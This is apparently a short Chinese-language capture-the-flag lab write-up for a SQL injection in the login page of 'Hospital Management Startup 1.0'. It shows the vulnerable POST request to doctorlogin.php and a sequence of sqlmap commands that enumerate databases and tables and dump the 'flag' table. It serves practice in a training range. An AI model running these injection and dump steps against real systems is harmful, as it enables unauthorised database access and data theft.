靶场介绍
Hospital Management Startup 1.0 sqli
开启靶场
POC
POST /doctorlogin.php
loginid=1&password=1&submit=Login
解题步骤
注入点在登陆处,登录用burp抓包放到sqlmap跑
通过sqlmap自动化工具测试
Sqlmap -r “目标”
查看所有数据库
Sqlmap -r “目标” --dbs
查看ctf数据库中的表
Sqlmap -r “目标” -D ctf --tables
读取flag中的数据
Sqlmap -r “目标” -D ctf -T flag --dump